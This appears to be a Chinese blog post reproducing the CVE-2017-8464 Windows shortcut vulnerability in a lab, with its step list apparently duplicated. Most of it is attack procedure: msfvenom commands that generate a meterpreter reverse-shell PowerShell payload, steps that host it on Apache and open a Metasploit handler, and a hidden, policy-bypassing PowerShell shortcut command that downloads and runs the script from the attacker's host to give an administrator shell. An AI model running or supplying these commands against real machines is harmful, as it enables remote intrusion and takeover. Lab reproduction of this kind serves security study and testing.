CVE-2017-8464 远程命令执行漏洞复现
2018-01-22 19:54
1511 查看
漏洞编号:CVE2017-8464
服务器版本:Windows 7 专业版
攻击工具:metasploit
靶机IP:192.168.1.198
攻击机IP:192.168.1.187(kali)
漏洞复现原理:创建包含恶意执行脚本的快捷方式并且运行,致使本机中毒。
运行kali,在终端中生成一个反弹shell,执行:
如果目标机是64位主机执行:
进入到【/opt】目录下,查看文件“search.ps1”是否创建成功
将创建的“search.ps1”文件copy到【/var/www/html】目录下
启动Apache服务器
网页访问http://192.168.1.187/search.ps1,查看是否成功
在kali下面启动MSF软件输入命令
输入命令进入【handler】use exploit/multi/handler
指定本机IP 【LHOST】
指定端口【LPORT】
设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp
运行
在目标机中创建快捷键,在对象的位置中输入:
然后点击下一步,快捷名称命名为:powershell.exe(默认的powershell.exe)
运行快捷方式,回到kali攻击机中,如果msf从监听模式变成如下形式,表示已经获取目标机shell
执行ls命令,可以发现所列出的文件在目标机的C盘下
执行shell命令,进入靶机,就可以执行cmd命令了(此处已经是管理员权限,故而不在进行提权)
服务器版本:Windows 7 专业版
攻击工具:metasploit
靶机IP:192.168.1.198
攻击机IP:192.168.1.187(kali)
漏洞复现原理:创建包含恶意执行脚本的快捷方式并且运行,致使本机中毒。
运行kali,在终端中生成一个反弹shell,执行:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=5555 -f psh-reflection>/opt/search.ps1
如果目标机是64位主机执行:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=5555 -f psh-reflection>/opt/search.ps1
进入到【/opt】目录下,查看文件“search.ps1”是否创建成功
将创建的“search.ps1”文件copy到【/var/www/html】目录下
启动Apache服务器
网页访问http://192.168.1.187/search.ps1,查看是否成功
在kali下面启动MSF软件输入命令
输入命令进入【handler】use exploit/multi/handler
指定本机IP 【LHOST】
指定端口【LPORT】
设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp
运行
在目标机中创建快捷键,在对象的位置中输入:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.187/search.ps1');test.ps1"
然后点击下一步,快捷名称命名为:powershell.exe(默认的powershell.exe)
运行快捷方式,回到kali攻击机中,如果msf从监听模式变成如下形式,表示已经获取目标机shell
执行ls命令,可以发现所列出的文件在目标机的C盘下
执行shell命令,进入靶机,就可以执行cmd命令了(此处已经是管理员权限,故而不在进行提权)
相关文章推荐
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- CVE-2017-8464远程命令执行漏洞复现
- 【S2-052】Struts2远程命令执行漏洞(CVE-2017-9805)
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- iis6.0远程代码执行漏洞复现(CVE-2017-7269)
- 【漏洞公告】CVE-2017-11610:Supervisord 远程命令执行漏洞
- 【S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- 【渗透测试】ApacheTomcat 远程代码执行漏洞复现CVE-2017-12615
- 【漏洞公告】CVE-2017-9791:Struts(S2-048)远程命令执行漏洞
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- 【漏洞公告】CVE-2017-8464 :Microsoft Windows LNK 远程代码执行漏洞
- Supervisord远程命令执行漏洞分析(CVE-2017-11610)
- CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现
- Supervisord 远程命令执行漏洞(CVE-2017-11610)
- 【高危漏洞预警】CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052)
- Office CVE-2017-8570 远程代码执行漏洞复现
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
- Apache Struts2 includeParams属性远程命令执行漏洞(CVE-2013-1966)